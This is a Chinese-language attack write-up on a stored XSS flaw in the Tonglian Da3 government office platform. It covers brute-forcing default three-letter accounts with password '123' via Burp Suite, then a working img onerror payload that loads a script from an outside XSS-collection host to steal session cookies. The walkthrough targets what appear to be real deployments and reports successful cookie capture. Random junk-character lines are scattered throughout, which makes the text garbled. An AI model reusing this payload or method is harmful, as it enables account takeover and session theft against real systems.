2 ` b: V6 T% a
( J. j0 V4 s- x; r g$ m. W
同联Da3协同办公平台后台通用储存型xss漏洞1 Z2 }+ S6 N! @+ |/ O
4 {0 |; N' f9 D/ u
) Y' x7 J( X8 t! m% d
平台简介:1 ~& E$ U6 `! I" m# Y2 F; m- x
6 i+ E5 A7 g! W" S
/ m8 M$ @5 S9 e6 L: N
* x0 \& I7 e4 { y; u
/ i( `! H8 x# J, ^1 l Q
5 [& c3 n7 S- X2 ~
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
5 c! }7 Q8 M, W3 N. [! s7 C! A3 N
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
- w0 r3 R+ a' x6 U2 h
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!! o# q# q2 w1 e4 |* D
2 F# l; q J3 X+ M* e
9 d& u$ T3 C- v& K5 s$ w2 Y
) X: Z. T- K1 |, \- x) t. D3 n0 `
I* g- L6 \) S& v # b8 D1 J' P! J$ L" e, M) `" [
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 A }9 }. c+ D* F) W2 }( @, l
$ o, J( R' D$ u9 ?( I+ A% |
) |- I2 c! ~; \6 X* ?; R ( R) n( Y) P( Y' f. O) Y
8 f6 X. F) B6 d, M# S/ v8 g
4 ?, l G5 F7 e0 s& O i http://1.1.1.1:7197/cap-aco/#(案例2-); Y( d9 Q3 W, W
; Z! N/ y7 Y2 T6 t
( v* G: `& I" x# ~* m5 V/ J http://www.XXOO.com (案例1-官网网站)9 a7 K/ P" ~ r* I2 h! P# }
: y0 j$ y* i/ R# p/ Q$ s
4 v/ t2 s" a" r6 L5 _# E
漏洞详情:( Z0 s+ x1 B/ q3 u6 m" u$ R1 c
5 q+ T4 z* r: f) `3 o# X ( S3 s2 O) g l' f4 l: Y
案例一、
" X9 D5 @2 X. I
* u" m5 }# Z" z2 E, W7 |" ]6 R
% F' Q) b- y# t
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 [7 K5 o$ m& R- q' [, K; r& f
0 S" S( a, E0 D; b1 P4 s' Q 2 |# M: L1 p7 ?8 O+ L7 D S7 T
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
* a# W- h# n5 O
8 k! o( O* W2 O+ {3 ^" V 1 f$ [" M* P. m7 l
4 u/ y* H( u5 h* Z
9 @; t4 g1 m: n" ^4 m7 N- V7 \
2 Z1 c u5 H$ G' D/ E2 e) b
( |8 D) @1 l+ {6 T& e% h+ C
' f ~0 t0 S, w4 M3 H8 j
0 u. o/ L: ~& m status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
$ V9 j; v* ?: u( }
, C, C$ I2 E5 s; F4 m' v- S ! d- m9 l' |4 d6 j( w" ]
: B2 U; U6 F0 l3 v9 O
9 b: D6 b" ]; z/ s* g8 b7 m
/ b/ v. P* A: b( B. [
t, @( d* K' o7 k: u" z, \
) u5 s9 U* L, M4 U- S; @: N
' a, T# ~! `4 h4 H/ }1 @
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
& C; `! A/ B' l6 Y: `8 O! `5 H
k( J, I2 f. z, R# X* F/ V8 h: X
) K$ a$ z% w: K6 T+ W ; a7 g3 l4 ]5 B+ D- y0 w
6 y2 U! B) j- s6 a2 x6 @, Z" j ' S& ~& |9 A/ f4 k
<img src=x
* t2 ]$ v+ m1 @5 A& m8 Sonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
8 E; Y/ Q. S1 y* T3 O* T
3 ]$ h7 o. E/ r2 w& } C e+ l( ` L& d
, u9 q- u [1 A4 I; B8 D
& s9 z3 O6 ?( v$ W# T* F
; t# x3 J- K. D/ R( c
/ O( R& V; {8 V8 N) R 然后发送,接收cookie如图: & v; n' x6 P2 H7 }
* F5 D1 n. T$ Y& g . c3 O# ]2 }! X. ^1 M
5 [, ^+ B: B5 i# o
1 o: b1 w. v" C" u. r
" Y0 A9 R: }7 H l; v. [" |! g/ ?+ L9 } 5 H2 g! D' q: _$ k" @
/ ?, }- O* a! ]+ D: ? h- F7 C- ~" \ c
& m! T1 l% S, a/ I
0 C8 h& N4 g' \3 S ( U# i6 D' x, P' e
: n: }0 `; F! x, J! a0 t5 O
~- V! Y; B+ e/ C4 ?. @$ a 9 F5 W* f7 ^( g+ Q/ g
( ]3 [$ z+ J+ X# z! E
0 n$ X7 B) L( Z/ K
1 a0 y# |8 L5 [3 O
# I6 U/ \8 j3 B( G
+ F/ N/ O* T' W+ P: K 0 W8 f( ?; d8 O2 x/ E' ~% P5 a1 v
4 y& V [! R( H
; D. @6 n. ?' f
6 ] I i" ^( G 案例2、
, L, k+ Y( @( R& o8 M) |$ @* f
. h( p# ^6 H; j, F7 k7 X ; L7 b. q) f5 y
前面步骤都一样,下面看效果图: 1 o; J+ u7 z) `- R9 D
% [& S1 [2 I; G( @6 F* \ 2 x3 l) U' m$ H. I+ G' I, D6 E
! j( V( H2 c+ D" i9 y* j! s u5 `
, Z" b- v" P. [- e; W. ?; H: A
- m3 f' I$ b5 f/ m4 g6 W0 y
* o) O3 O& x! r2 s
" A: K8 q% o5 j t9 w5 ^4 B9 F
7 ] w; ?" n. l4 d$ r( z) m' A 0 h% N5 S1 H# g2 B: e4 L
* @4 U8 B/ ^: c5 V0 D$ E
3 E6 V0 G3 F1 r) E8 J' l5 V
/ [) y% {# H7 e) ^+ M
$ J+ P: p. A$ x4 K
5 A9 s- t% s. ~: j9 `' \
) p" c* w1 X6 ~/ Z
i- \. l$ F1 b$ k' T ]
$ \9 S. ^& b$ q- x
; i* o% ~9 c& I8 R( t9 N9 h
" n" |( v# N' ~% \+ ?% E+ f% i # I! @5 B8 c! z! z; _5 |) P: A
) O- a6 R$ n" B k+ n
' L' X' m7 p* | 1 D- F1 @- I* o- [- B T
1 |& H* c% i# r( M# R
2 A6 A" m. t& w7 N, [
: s) q1 _6 Y: S" H/ k " u: ]1 g7 ~# Y
( n, S4 a; l5 h' v: y